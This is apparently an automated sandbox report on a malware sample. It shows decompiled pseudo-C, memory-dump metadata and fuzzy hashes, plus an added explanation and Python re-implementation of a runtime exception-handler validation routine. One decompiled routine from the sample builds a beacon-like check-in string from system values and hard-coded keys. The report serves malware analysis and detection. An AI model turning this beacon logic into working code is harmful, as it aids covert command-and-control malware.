            							__eflags = _t80 - 0xffffffff;
            							if(_t80 == 0xffffffff) {
            								goto L9;
            							}
            							__eflags = _t80 - _t91;
            							if(_t80 >= _t91) {
            								L20:
            								_t63 = 0;
            								L60:
            								return _t63;
            							}
            							L9:
            							__eflags =  *(_t57 + 4);
            							if( *(_t57 + 4) != 0) {
            								_t12 =  &_a4;
            								 *_t12 = _a4 + 1;
            								__eflags =  *_t12;
            							}
            							_t91 = _t91 + 1;
            							_t57 = _t57 + 0xc;
            							__eflags = _t91 - _t102;
            						} while (_t91 <= _t102);
            						__eflags = _a4;
            						if(_a4 == 0) {
            							L15:
            							_t81 =  *0x7ea380; // 0x0 (number of cached pages; the cache at 0x7ea388 holds up to 16 entries)
            							_t110 = _t76 & 0xfffff000;
            							_t58 = 0;
            							__eflags = _t81;
            							if(_t81 <= 0) {
            								L18:
            								_t104 = _t102 | 0xffffffff;
            								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4); // current process (-1), MemoryBasicInformation, 0x1c-byte MEMORY_BASIC_INFORMATION in _v36
            								__eflags = _t61;
            								if(_t61 < 0) {
            									_t62 = 0;
            									__eflags = 0;
            								} else {
            									_t62 = _a4;
            								}
            								__eflags = _t62;
            								if(_t62 == 0) {
            									L59:
            									_t63 = _t104;
            									goto L60;
            								} else {
            									__eflags = _v12 - 0x1000000; // _v12 = mbi.Type; anything but MEM_IMAGE is undecidable (L59 returns -1)
            									if(_v12 != 0x1000000) {
            										goto L59;
            									}
            									__eflags = _v16 & 0x000000cc; // _v16 = mbi.Protect; 0xcc = PAGE_READWRITE | PAGE_WRITECOPY | PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY; no writable bit means accept
            									if((_v16 & 0x000000cc) == 0) {
            										L46:
            										_t63 = 1;
            										 *0x7ea3c8 = 1;
            										__eflags =  *0x7ea3c8;
            										if( *0x7ea3c8 != 0) {
            											goto L60;
            										}
            										_t84 =  *0x7ea380; // 0x0
            										__eflags = _t84;
            										_t93 = _t84;
            										if(_t84 <= 0) {
            											L51:
            											__eflags = _t93;
            											if(_t93 != 0) {
            												L58:
            												 *0x7ea3c8 = 0;
            												goto L5;
            											}
            											_t77 = 0xf;
            											__eflags = _t84 - _t77;
            											if(_t84 <= _t77) {
            												_t77 = _t84;
            											}
            											_t94 = 0;
            											__eflags = _t77;
            											if(_t77 < 0) {
            												L56:
            												__eflags = _t84 - 0x10;
            												if(_t84 < 0x10) {
            													_t86 = _t84 + 1;
            													__eflags = _t86;
            													 *0x7ea380 = _t86;
            												}
            												goto L58;
            											} else {
            												do {
            													_t68 = 0x7ea388 + _t94 * 4;
            													_t94 = _t94 + 1;
            													__eflags = _t94 - _t77;
            													 *_t68 = _t110;
            													_t110 =  *_t68;
            												} while (_t94 <= _t77);
            												goto L56;
            											}
            										}
            										_t69 = 0x7ea384 + _t84 * 4;
            										while(1) {
            											__eflags =  *_t69 - _t110;
            											if( *_t69 == _t110) {
            												goto L51;
            											}
            											_t93 = _t93 - 1;
            											_t69 = _t69 - 4;
            											__eflags = _t93;
            											if(_t93 > 0) {
            												continue;
            											}
            											goto L51;
            										}
            										goto L51;
            									}
            									_t87 = _v32; // mbi.AllocationBase, i.e. the module base of the image
            									__eflags =  *_t87 - 0x5a4d; // "MZ"
            									if( *_t87 != 0x5a4d) {
            										goto L59;
            									}
            									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87; // IMAGE_NT_HEADERS via e_lfanew
            									__eflags =  *_t71 - 0x4550; // "PE\0\0"
            									if( *_t71 != 0x4550) {
            										goto L59;
            									}
            									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b; // OptionalHeader.Magic must be PE32 (0x10b)
            									if( *((short*)(_t71 + 0x18)) != 0x10b) {
            										goto L59;
            									}
            									_t78 = _t76 - _t87;
            									__eflags =  *((short*)(_t71 + 6));
            									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18; // first section header = NT headers + 0x18 + SizeOfOptionalHeader
            									if( *((short*)(_t71 + 6)) <= 0) {
            										goto L59;
            									}
            									_t72 =  *((intOrPtr*)(_t89 + 0xc));
            									__eflags = _t78 - _t72;
            									if(_t78 < _t72) {
            										goto L46;
            									}
            									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
            									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
            										goto L46;
            									}
            									__eflags =  *(_t89 + 0x27) & 0x00000080; // Characteristics & IMAGE_SCN_MEM_WRITE (0x80000000)
            									if(( *(_t89 + 0x27) & 0x00000080) != 0) { // scope table inside a writable first section: reject (L20 returns 0)
            										goto L20;
            									}
            									goto L46;
            								}
            							} else {
            								goto L16;
            							}
            							while(1) {
            								L16:
            								__eflags =  *((intOrPtr*)(0x7ea388 + _t58 * 4)) - _t110;
            								if( *((intOrPtr*)(0x7ea388 + _t58 * 4)) == _t110) {
            									break;
            								}
            								_t58 = _t58 + 1;
            								__eflags = _t58 - _t81;
            								if(_t58 < _t81) {
            									continue;
            								}
            								goto L18;
            							}
            							__eflags = _t58;
            							if(_t58 <= 0) {
            								goto L5;
            							}
            							 *0x7ea3c8 = 1;
            							__eflags =  *0x7ea3c8;
            							if( *0x7ea3c8 != 0) {
            								goto L5;
            							}
            							__eflags =  *((intOrPtr*)(0x7ea388 + _t58 * 4)) - _t110;
            							if( *((intOrPtr*)(0x7ea388 + _t58 * 4)) == _t110) {
            								L32:
            								_t100 = 0;
            								__eflags = _t58;
            								if(_t58 < 0) {
            									L34:
            									 *0x7ea3c8 = 0;
            									goto L5;
            								} else {
            									goto L33;
            								}
            								do {
            									L33:
            									_t90 = 0x7ea388 + _t100 * 4;
            									_t100 = _t100 + 1;
            									__eflags = _t100 - _t58;
            									 *_t90 = _t110;
            									_t110 =  *_t90;
            								} while (_t100 <= _t58);
            								goto L34;
            							}
            							_t25 = _t81 - 1; // -1
            							_t58 = _t25;
            							__eflags = _t58;
            							if(_t58 < 0) {
            								L28:
            								__eflags = _t81 - 0x10;
            								if(_t81 < 0x10) {
            									_t81 = _t81 + 1;
            									__eflags = _t81;
            									 *0x7ea380 = _t81;
            								}
            								_t28 = _t81 - 1; // 0x0
            								_t58 = _t28;
            								goto L32;
            							} else {
            								goto L25;
            							}
            							while(1) {
            								L25:
            								__eflags =  *((intOrPtr*)(0x7ea388 + _t58 * 4)) - _t110;
            								if( *((intOrPtr*)(0x7ea388 + _t58 * 4)) == _t110) {
            									break;
            								}
            								_t58 = _t58 - 1;
            								__eflags = _t58;
            								if(_t58 >= 0) {
            									continue;
            								}
            								break;
            							}
            							__eflags = _t58;
            							if(__eflags >= 0) {
            								if(__eflags == 0) {
            									goto L34;
            								}
            								goto L32;
            							}
            							goto L28;
            						}
            						_t75 =  *((intOrPtr*)(_t108 - 8));
            						__eflags = _t75 - _v8;
            						if(_t75 < _v8) {
            							goto L20;
            						}
            						__eflags = _t75 - _t108;
            						if(_t75 >= _t108) {
            							goto L20;
            						}
            						goto L15;
            					}
            					L5:
            					_t63 = 1;
            					goto L60;
            				} else {
            					goto L3;
            				}
            			}
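            By structure this routine validates a frame-based exception registration record with the EH3 layout (scope table at offset 8, try level at offset 0xc, 12-byte scope entries): it rejects a scope-table pointer that is not 4-byte aligned or that lies inside the current thread's stack ([fs:4] is StackBase, [fs:8] is StackLimit), walks the scope table up to the current try level requiring each enclosing level to be -1 or smaller than the entry's own index, consults a 16-entry page cache at 0x7ea388, and otherwise calls NtQueryVirtualMemory with a 0x1c-byte MEMORY_BASIC_INFORMATION. The page must be MEM_IMAGE (0x1000000); if its protection has any writable bit (0xcc), the PE headers at AllocationBase are parsed and the table is rejected when it falls inside the first section and that section is marked IMAGE_SCN_MEM_WRITE. The return codes are 1 (valid), 0 (reject) and -1 (undecidable). This is the shape of the MSVC runtime's SEH3 scope-table validator, statically linked runtime code rather than the sample's own logic; that identification is an assessment from the code, not something the report states. The Python below is an added re-implementation of the pure-memory checks, written for this page and not taken from the sample; the PE32 header and scope tables it consumes are constructed in-file and are test input only.

```python
"""Added re-implementation of the memory checks performed by E007E8551.
Not code from the sample; the PE32 header and scope tables are constructed
here as test input and are not loadable images."""
import struct

MEM_IMAGE = 0x1000000
# PAGE_READWRITE | PAGE_WRITECOPY | PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY
WRITABLE_PROTECT = 0x04 | 0x08 | 0x40 | 0x80        # == 0xcc in the listing
IMAGE_SCN_MEM_WRITE = 0x80000000                    # bit 0x80 of the byte at section+0x27
PE32_MAGIC = 0x10B
NO_TRYLEVEL = 0xFFFFFFFF


def scopetable_pointer_ok(scopetable, stack_limit, stack_base):
    """First two checks in the listing: 4-byte aligned and not on this
    thread's stack ([fs:8] = StackLimit, [fs:4] = StackBase)."""
    return (scopetable & 3) == 0 and not (stack_limit <= scopetable < stack_base)


def scope_table_is_sane(table, trylevel):
    """The do/while loop: entries are 12 bytes (EnclosingLevel, FilterFunc,
    HandlerFunc). Each EnclosingLevel must be -1 or below the entry's own
    index. Returns (ok, number_of_entries_with_a_filter)."""
    if trylevel == NO_TRYLEVEL:
        return True, 0
    filters = 0
    for i in range(trylevel + 1):
        try:
            enclosing, filt, _handler = struct.unpack_from('<III', table, i * 12)
        except struct.error:                        # table shorter than trylevel claims
            return False, filters
        if enclosing != NO_TRYLEVEL and enclosing >= i:
            return False, filters
        if filt:
            filters += 1
    return True, filters


def _first_section_verdict(image, rva):
    """PE walk from the listing: returns -1 if the headers are not PE32,
    0 if rva sits in a writable first section, 1 otherwise."""
    if image[:2] != b'MZ':
        return -1
    nt = struct.unpack_from('<I', image, 0x3C)[0]
    if image[nt:nt + 4] != b'PE\x00\x00':
        return -1
    if struct.unpack_from('<H', image, nt + 0x18)[0] != PE32_MAGIC:
        return -1
    if struct.unpack_from('<h', image, nt + 6)[0] <= 0:      # NumberOfSections, signed compare
        return -1
    opt_size = struct.unpack_from('<H', image, nt + 0x14)[0]
    first_section = nt + 0x18 + opt_size
    vsize, vaddr = struct.unpack_from('<II', image, first_section + 8)
    characteristics = struct.unpack_from('<I', image, first_section + 0x24)[0]
    if rva < vaddr or rva >= vaddr + vsize:
        return 1                                    # outside the first section: accepted
    return 0 if characteristics & IMAGE_SCN_MEM_WRITE else 1


def validate_scopetable_page(mem_type, protect, image, rva):
    """The part after NtQueryVirtualMemory, with the listing's return codes:
    1 = accept, 0 = reject, -1 = cannot decide. mem_type/protect stand in
    for mbi.Type and mbi.Protect; image is the module at mbi.AllocationBase."""
    if mem_type != MEM_IMAGE:
        return -1
    if protect & WRITABLE_PROTECT == 0:
        return 1
    try:
        return _first_section_verdict(image, rva)
    except struct.error:                            # header runs past the buffer
        return -1


def build_pe32(section_va, section_size, characteristics):
    """Constructed PE32 header: DOS stub, NT headers, one section. Test input only."""
    dos = bytearray(0x40)
    dos[:2] = b'MZ'
    struct.pack_into('<I', dos, 0x3C, 0x40)         # e_lfanew
    file_hdr = struct.pack('<HHIIIHH', 0x14C, 1, 0, 0, 0, 0xE0, 0x102)
    opt = bytearray(0xE0)
    struct.pack_into('<H', opt, 0, PE32_MAGIC)
    section = struct.pack('<8sIIIIIIHHI', b'.text', section_size, section_va,
                          0, 0, 0, 0, 0, 0, characteristics)
    return bytes(dos) + b'PE\x00\x00' + file_hdr + bytes(opt) + section


def build_scope_table(entries):
    """Pack (EnclosingLevel, FilterFunc, HandlerFunc) triples. Test input only."""
    return b''.join(struct.pack('<III', *e) for e in entries)


if __name__ == '__main__':
    ro_text = build_pe32(0x1000, 0x2000, 0x60000020)    # code | execute | read
    rw_text = build_pe32(0x1000, 0x2000, 0xC0000040)    # data | read | write
    print(validate_scopetable_page(MEM_IMAGE, 0x40, ro_text, 0x1800))   # 1
    print(validate_scopetable_page(MEM_IMAGE, 0x40, rw_text, 0x1800))   # 0
```

            The order of the checks matters for the security property: a scope table that the VMM reports as writable is still accepted when the image's own section flags say the first section is read-only, so an attacker who has only a writable data page in the module cannot point the record at it, while one who can write the first section of a mapped image is outside what this check defends against.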

            Instruction address column for E007E8551 (collapsed): 0x007e855b to 0x007e876e
            0x007e8643
            0x007e8643
            0x007e8643
            0x007e864a
            0x00000000
            0x00000000
            0x007e864c
            0x007e864c
            0x007e864d
            0x00000000
            0x00000000
            0x00000000
            0x007e864d
            0x007e864f
            0x007e8651
            0x007e8664
            0x00000000
            0x00000000
            0x00000000
            0x007e8664
            0x00000000
            0x007e8651
            0x007e85c3
            0x007e85c6
            0x007e85c9
            0x00000000
            0x00000000
            0x007e85cb
            0x007e85cd
            0x00000000
            0x00000000
            0x00000000
            0x007e85cd
            0x007e8592
            0x007e8594
            0x00000000
            0x00000000
            0x00000000
            0x00000000

            APIs
            • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 007E8602
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: MemoryQueryVirtual
            • String ID:
            • API String ID: 2850889275-0
            • Opcode ID: 53c7dbaa4dee88497f363dab941aceb016fa0deffba20bd955b5a45631f00853
            • Instruction ID: b49c7ef94b5972603751b8b0ecdbf2849829e60149b4392125e1b79653578ebe
            • Opcode Fuzzy Hash: 53c7dbaa4dee88497f363dab941aceb016fa0deffba20bd955b5a45631f00853
            • Instruction Fuzzy Hash: EA61E4316026C19FCBA9CF6AC98062973A1FB8D354B348439D41ECB292EF3DDC428656
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000000.00000002.509538367.000000000040F000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040F000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_40f000_server.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
            • Instruction ID: 6a61aaf81cceb962ac43e89968d19062db41915cb31680b98768ff6a35e7641c
            • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
            • Instruction Fuzzy Hash: B4C1B373D5E5F3058B35492D05182BFEE626E81B4231FC3D2DCD43F289C22A6EA696D4
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000000.00000002.509538367.000000000040F000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040F000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_40f000_server.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
            • Instruction ID: 210b0bbc6fa7648ea2dec32900c8f8778a93b69b975d2da7577560c404c6e586
            • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
            • Instruction Fuzzy Hash: 0AC1D473D5A5F30587354A2D05182BBEEA16E81B4131FC392DCD43F389C22A6EA6D6D4
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000000.00000002.509538367.000000000040F000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040F000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_40f000_server.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
            • Instruction ID: 5199c5bc16864de70c6dcf7905d63cf28dc46ea8416786d032595d3cba67f2f8
            • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
            • Instruction Fuzzy Hash: 5AC1E533D5E5F3058B36492D05182BFEE626E81B4531FC3D2CCD43F689C62A6EA685D4
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000000.00000002.509538367.000000000040F000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040F000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_40f000_server.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
            • Instruction ID: a2b0026a64bfaf7b2cdf986373f4502d60de115db649975ff53bd1799c231f25
            • Opcode Fuzzy Hash: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
            • Instruction Fuzzy Hash: C8B1D433D5A5F3058735852D05182BBEEA26E81B4131FC396DCD43F289C62AAEA692D4
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 71%
            			E007E832C(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
            				intOrPtr _v8;
            				char _v12;
            				void* __ebp;
            				signed int* _t43;
            				char _t44;
            				void* _t46;
            				void* _t49;
            				intOrPtr* _t53;
            				void* _t54;
            				void* _t65;
            				long _t66;
            				signed int* _t80;
            				signed int* _t82;
            				void* _t84;
            				signed int _t86;
            				void* _t89;
            				void* _t95;
            				void* _t96;
            				void* _t99;
            				void* _t106;
            
            				_t43 = _t84;
            				_t65 = __ebx + 2;
            				 *_t43 =  *_t43 ^ __edx ^  *__eax;
            				_t89 = _t95;
            				_t96 = _t95 - 8;
            				_push(_t65);
            				_push(_t84);
            				_push(_t89);
            				asm("cld");
            				_t66 = _a8;
            				_t44 = _a4;
            				if(( *(_t44 + 4) & 0x00000006) != 0) {
            					_push(_t89);
            					E007E8497(_t66 + 0x10, _t66, 0xffffffff);
            					_t46 = 1;
            				} else {
            					_v12 = _t44;
            					_v8 = _a12;
            					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
            					_t86 =  *(_t66 + 0xc);
            					_t80 =  *(_t66 + 8);
            					_t49 = E007E8551(_t66);
            					_t99 = _t96 + 4;
            					if(_t49 == 0) {
            						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
            						goto L11;
            					} else {
            						while(_t86 != 0xffffffff) {
            							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
            							if(_t53 == 0) {
            								L8:
            								_t80 =  *(_t66 + 8);
            								_t86 = _t80[_t86 + _t86 * 2];
            								continue;
            							} else {
            								_t54 =  *_t53();
            								_t89 = _t89;
            								_t86 = _t86;
            								_t66 = _a8;
            								_t55 = _t54;
            								_t106 = _t54;
            								if(_t106 == 0) {
            									goto L8;
            								} else {
            									if(_t106 < 0) {
            										_t46 = 0;
            									} else {
            										_t82 =  *(_t66 + 8);
            										E007E843C(_t55, _t66);
            										_t89 = _t66 + 0x10;
            										E007E8497(_t89, _t66, 0);
            										_t99 = _t99 + 0xc;
            										E007E8533(_t82[2]);
            										 *(_t66 + 0xc) =  *_t82;
            										_t66 = 0;
            										_t86 = 0;
            										 *(_t82[2])(1);
            										goto L8;
            									}
            								}
            							}
            							goto L13;
            						}
            						L11:
            						_t46 = 1;
            					}
            				}
            				L13:
            				return _t46;
            			}


            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
            • Instruction ID: bbc7a375474243a7e833a8e9b3b4633d0621fe9afaa75cccd8604b2b6eeb4bac
            • Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
            • Instruction Fuzzy Hash: F3212832901244DFCB10EF69C8C49ABBBA5FF49350B458168E819DB245EF34F925CBE1
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000000.00000002.509856527.0000000000850000.00000040.00000020.00020000.00000000.sdmp, Offset: 00850000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_850000_server.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
            • Instruction ID: f8562ba4f6d4c0545a5e9f8261aed9a278ae4a135e11c9d9052b358a31e4377f
            • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
            • Instruction Fuzzy Hash: 51118E72380504AFDB44DF59DCA1FA677EAFB88325B298065ED05CB316E675EC02C760
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000000.00000002.509728577.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_780000_server.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
            • Instruction ID: c137a415cd33a37c16b2a2ea5c25f585a778bfd2a950d56cefb96e01b2f897f6
            • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
            • Instruction Fuzzy Hash: 0C01F272B406008FDF61EF60C805BAB33E5FB86306F0544A4D90A97282E378A8498BD0
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 76%
            			E007E2B91(long __eax, intOrPtr _a4, void* _a8, void* _a16, void* _a20, void* _a24, intOrPtr _a32, void* _a40, intOrPtr _a44) {
            				intOrPtr _v4;
            				signed int _v8;
            				int* _v12;
            				char* _v16;
            				intOrPtr _v20;
            				void* _v24;
            				intOrPtr _v32;
            				intOrPtr _v36;
            				void* _v40;
            				void* __ebx;
            				void* __edi;
            				long _t68;
            				intOrPtr _t69;
            				intOrPtr _t70;
            				intOrPtr _t71;
            				intOrPtr _t72;
            				intOrPtr _t73;
            				void* _t76;
            				intOrPtr _t77;
            				int _t80;
            				intOrPtr _t81;
            				intOrPtr _t85;
            				intOrPtr _t86;
            				intOrPtr _t87;
            				void* _t89;
            				void* _t92;
            				intOrPtr _t96;
            				intOrPtr _t100;
            				intOrPtr* _t102;
            				int* _t108;
            				int* _t118;
            				char** _t120;
            				char* _t121;
            				intOrPtr* _t126;
            				intOrPtr* _t128;
            				intOrPtr* _t130;
            				intOrPtr* _t132;
            				intOrPtr _t135;
            				intOrPtr _t139;
            				int _t142;
            				intOrPtr _t144;
            				int _t147;
            				intOrPtr _t148;
            				int _t151;
            				void* _t152;
            				intOrPtr _t166;
            				void* _t168;
            				int _t169;
            				void* _t170;
            				void* _t171;
            				long _t172;
            				intOrPtr* _t173;
            				intOrPtr* _t174;
            				intOrPtr _t175;
            				intOrPtr* _t178;
            				char** _t181;
            				char** _t183;
            				char** _t184;
            				void* _t189;
            
            				_t68 = __eax;
            				_t181 =  &_v16;
            				_t152 = _a20;
            				_a20 = 8;
            				if(__eax == 0) {
            					_t68 = GetTickCount();
            				}
            				_t69 =  *0x7ea018; // 0x242da616
            				asm("bswap eax");
            				_t70 =  *0x7ea014; // 0x3a87c8cd
            				asm("bswap eax");
            				_t71 =  *0x7ea010; // 0xd8d2f808
            				asm("bswap eax");
            				_t72 =  *0x7ea00c; // 0xeec43f25
            				asm("bswap eax");
            				_t73 =  *0x7ea348; // 0x272d5a8
            				_t3 = _t73 + 0x7eb5ac; // 0x74666f73
            				_t169 = wsprintfA(_t152, _t3, 3, 0x3d18f, _t72, _t71, _t70, _t69,  *0x7ea02c,  *0x7ea004, _t68);
            				_t76 = E007E467F();
            				_t77 =  *0x7ea348; // 0x272d5a8
            				_t4 = _t77 + 0x7eb575; // 0x74707526
            				_t80 = wsprintfA(_t169 + _t152, _t4, _t76);
            				_t183 =  &(_t181[0xe]);
            				_t170 = _t169 + _t80;
            				if(_a24 != 0) {
            					_t148 =  *0x7ea348; // 0x272d5a8
            					_t8 = _t148 + 0x7eb508; // 0x732526
            					_t151 = wsprintfA(_t170 + _t152, _t8, _a24);
            					_t183 =  &(_t183[3]);
            					_t170 = _t170 + _t151;
            				}
            				_t81 =  *0x7ea348; // 0x272d5a8
            				_t10 = _t81 + 0x7eb89e; // 0x2f18e46
            				_t153 = _t10;
            				_t189 = _a20 - _t10;
            				_t12 = _t81 + 0x7eb246; // 0x74636126
            				_t164 = 0 | _t189 == 0x00000000;
            				_t171 = _t170 + wsprintfA(_t170 + _t152, _t12, _t189 == 0);
            				_t85 =  *0x7ea36c; // 0x2f195b0
            				_t184 =  &(_t183[3]);
            				if(_t85 != 0) {
            					_t144 =  *0x7ea348; // 0x272d5a8
            					_t16 = _t144 + 0x7eb8be; // 0x3d736f26
            					_t147 = wsprintfA(_t171 + _t152, _t16, _t85);
            					_t184 =  &(_t184[3]);
            					_t171 = _t171 + _t147;
            				}
            				_t86 = E007E472F(_t153);
            				_a32 = _t86;
            				if(_t86 != 0) {
            					_t139 =  *0x7ea348; // 0x272d5a8
            					_t19 = _t139 + 0x7eb8d0; // 0x736e6426
            					_t142 = wsprintfA(_t171 + _t152, _t19, _t86);
            					_t184 =  &(_t184[3]);
            					_t171 = _t171 + _t142;
            					HeapFree( *0x7ea2d8, 0, _a40);
            				}
            				_t87 = E007E1340();
            				_a32 = _t87;
            				if(_t87 != 0) {
            					_t135 =  *0x7ea348; // 0x272d5a8
            					_t23 = _t135 + 0x7eb8c5; // 0x6f687726
            					wsprintfA(_t171 + _t152, _t23, _t87);
            					_t184 =  &(_t184[3]);
            					HeapFree( *0x7ea2d8, 0, _a40);
            				}
            				_t166 =  *0x7ea3cc; // 0x2f19600
            				_t89 = E007E6B59( &E007EA00A, _t166 + 4);
            				_t172 = 0;
            				_a16 = _t89;
            				if(_t89 == 0) {
            					L30:
            					HeapFree( *0x7ea2d8, _t172, _t152);
            					return _a44;
            				} else {
            					_t92 = RtlAllocateHeap( *0x7ea2d8, 0, 0x800);
            					_a24 = _t92;
            					if(_t92 == 0) {
            						L29:
            						HeapFree( *0x7ea2d8, _t172, _a8);
            						goto L30;
            					}
            					E007E2915(GetTickCount());
            					_t96 =  *0x7ea3cc; // 0x2f19600
            					__imp__(_t96 + 0x40);
            					asm("lock xadd [eax], ecx");
            					_t100 =  *0x7ea3cc; // 0x2f19600
            					__imp__(_t100 + 0x40);
            					_t102 =  *0x7ea3cc; // 0x2f19600
            					_t168 = E007E6675(1, _t164, _t152,  *_t102);
            					asm("lock xadd [eax], ecx");
            					if(_t168 == 0) {
            						L28:
            						HeapFree( *0x7ea2d8, _t172, _a16);
            						goto L29;
            					}
            					StrTrimA(_t168, 0x7e9280);
            					_push(_t168);
            					_t108 = E007E7563();
            					_v12 = _t108;
            					if(_t108 == 0) {
            						L27:
            						HeapFree( *0x7ea2d8, _t172, _t168);
            						goto L28;
            					}
            					_t173 = __imp__;
            					 *_t173(_t168, _a8);
            					 *_t173(_a4, _v12);
            					_t174 = __imp__;
            					 *_t174(_v4, _v24);
            					_t175 = E007E6536( *_t174(_v12, _t168), _v20);
            					_v36 = _t175;
            					if(_t175 == 0) {
            						_v8 = 8;
            						L25:
            						E007E63F6();
            						L26:
            						HeapFree( *0x7ea2d8, 0, _v40);
            						_t172 = 0;
            						goto L27;
            					}
            					_t118 = E007E6F7D(_t152, 0xffffffffffffffff, _t168,  &_v24);
            					_v12 = _t118;
            					if(_t118 == 0) {
            						_t178 = _v24;
            						_v20 = E007E597D(_t178, _t175, _v16, _v12);
            						_t126 =  *((intOrPtr*)(_t178 + 8));
            						 *((intOrPtr*)( *_t126 + 0x80))(_t126);
            						_t128 =  *((intOrPtr*)(_t178 + 8));
            						 *((intOrPtr*)( *_t128 + 8))(_t128);
            						_t130 =  *((intOrPtr*)(_t178 + 4));
            						 *((intOrPtr*)( *_t130 + 8))(_t130);
            						_t132 =  *_t178;
            						 *((intOrPtr*)( *_t132 + 8))(_t132);
            						E007E61DA(_t178);
            					}
            					if(_v8 != 0x10d2) {
            						L20:
            						if(_v8 == 0) {
            							_t120 = _v16;
            							if(_t120 != 0) {
            								_t121 =  *_t120;
            								_t176 =  *_v12;
            								_v16 = _t121;
            								wcstombs(_t121, _t121,  *_v12);
            								 *_v24 = E007E673A(_v16, _v16, _t176 >> 1);
            							}
            						}
            						goto L23;
            					} else {
            						if(_v16 != 0) {
            							L23:
            							E007E61DA(_v32);
            							if(_v12 == 0 || _v8 == 0x10d2) {
            								goto L26;
            							} else {
            								goto L25;
            							}
            						}
            						_v8 = _v8 & 0x00000000;
            						goto L20;
            					}
            				}
            			}


            APIs
            • GetTickCount.KERNEL32 ref: 007E2BA8
            • wsprintfA.USER32 ref: 007E2BF5
            • wsprintfA.USER32 ref: 007E2C12
